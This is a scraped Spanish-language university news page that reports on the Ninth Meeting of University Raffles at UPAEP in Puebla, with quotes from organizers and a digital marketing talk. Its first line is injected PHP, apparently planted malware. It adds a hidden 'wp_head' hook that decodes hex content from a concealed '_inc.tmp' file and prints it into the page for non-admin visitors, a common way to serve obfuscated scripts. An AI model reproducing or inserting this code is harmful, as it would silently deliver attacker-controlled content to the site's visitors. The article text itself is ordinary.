if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } IES, comprometidas con la educación a través de sorteos universitarios – La Opinión Universitaria La Opinión Universitaria
Menu

IES, comprometidas con la educación a través de sorteos universitarios

 

  • Se llevó a cabo la Novena Reunión de Sorteos Universitarios

Po Diego Cuautle

Con el objetivo de contribuir al desarrollo del país a través del apoyo a estudiantes, y la capacitación de los profesionales encargados de organizar sorteos, se llevó a cabo en la Universidad Popular Autónoma del Estado de Puebla (UPAEP) la Novena Reunión de Sorteos Universitarios.

El poder llevar a cabo este evento, permite que las Universidades que participan, compartan nuevas ideas y den recomendaciones con la meta de hacer crecer los sorteos que cada una de ellas lleva a cabo.

“El poder participar en reuniones como esta, es un ejemplo, ya que en cuestión de educación debemos de estar unidas las Universidades, tenemos que jalar parejo; es importante que colaboremos en aquello que nos es común (…) me parece que este estilo de colaboración debe de servir de ejemplo para otras áreas de las Instituciones Educativas”, reconoció Antonio Sánchez Díaz de Rivera, Director de General de Comunicación, Vinculación y Relaciones Institucionales.

Agregó que es a través de eventos como este que las buenas prácticas y experiencias se transmiten y ayuda a enfrentar obstáculos comunes en pro de los estudiantes y la sociedad, por lo que esta reunión entre Universidades hace que se busque tener mejores políticas públicas que impacten en la sociedad e impulsen la educación.

Por su parte, Guillermo Pérezbolde, Presidente de la Asociación Americana de Mercadotecnia, Capítulo Ciudad de México, impartió como parte de este encuentro la conferencia Marketing Digital, donde compartió consejos a los representantes de las distintas universidades sobre el uso de la información de plataformas sociales para la colocación de su producto.

Expresó que a través de las herramientas digitales, es posible conocer más a fondo a los consumidores para hacer una mejor segmentación de los posibles compradores y entender a la persona desde todos los ángulos posibles.

El Base Marketing, dijo, estudia justamente elementos demográficos, psicográficos y firmográficos, es decir, indica dónde se encuentra, cuáles son sus gustos y cuál es su principal fuente de ingresos.

Por ello, señaló, es importante hablarles en el mismo idioma, sobre todo a los vendedores, que por lo general se sienten utilizados; “debemos entenderlos antes de esperar que tomen una acción favorable hacia el producto. Tenemos que construir esa visión positiva hacia el mismo proyecto que nosotros estamos convencidos”, acotó.

Cabe destacar que en esta reunión participaron la Universidad Tecnológica de Puebla, Universidad de Sonora, la BUAP, Universidad Interamericana, Universidad Anáhuac, Tecnológico de Monterrey, ITSON y la Universidad Autónoma de Baja California.

  • Tweets recientes